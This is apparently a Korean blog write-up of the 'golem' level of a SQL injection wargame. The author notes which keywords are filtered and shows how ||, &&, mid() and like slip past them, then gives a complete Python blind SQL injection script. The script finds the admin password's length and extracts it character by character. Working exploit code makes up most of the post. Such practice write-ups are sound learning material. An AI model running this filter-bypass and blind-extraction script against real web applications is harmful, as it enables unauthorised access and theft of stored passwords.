LOS - golem

11번째 문제 golem 이다.

 

or and substr = 가 필터링 되어 있다.

 

각각 || && mid() like 로 우회하면 된다.

import requests

url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'

php = '세션값'

pl = 0

for i in range(1,100):

    r = requests.get(url, params={'pw':f"' || id like 'admin' && length(pw) like {i};-- -"}, cookies={'PHPSESSID':php})

    # print(r.text)

    if "Hello admin" in r.text:

        print(i)

        pl=i

        break

password = ''

for i in range(1,pl+1):

    for j in range(48,123):

        r = requests.get(url, params={'pw':f"' || id like 'admin' && ascii(mid(pw,{i},1)) like '{j}';-- -"}, cookies={'PHPSESSID':php})

        if 'Hello admin' in r.text:

            password += chr(j)

            break

print(password)      

이렇게 코드를 짜면

 

풀었다!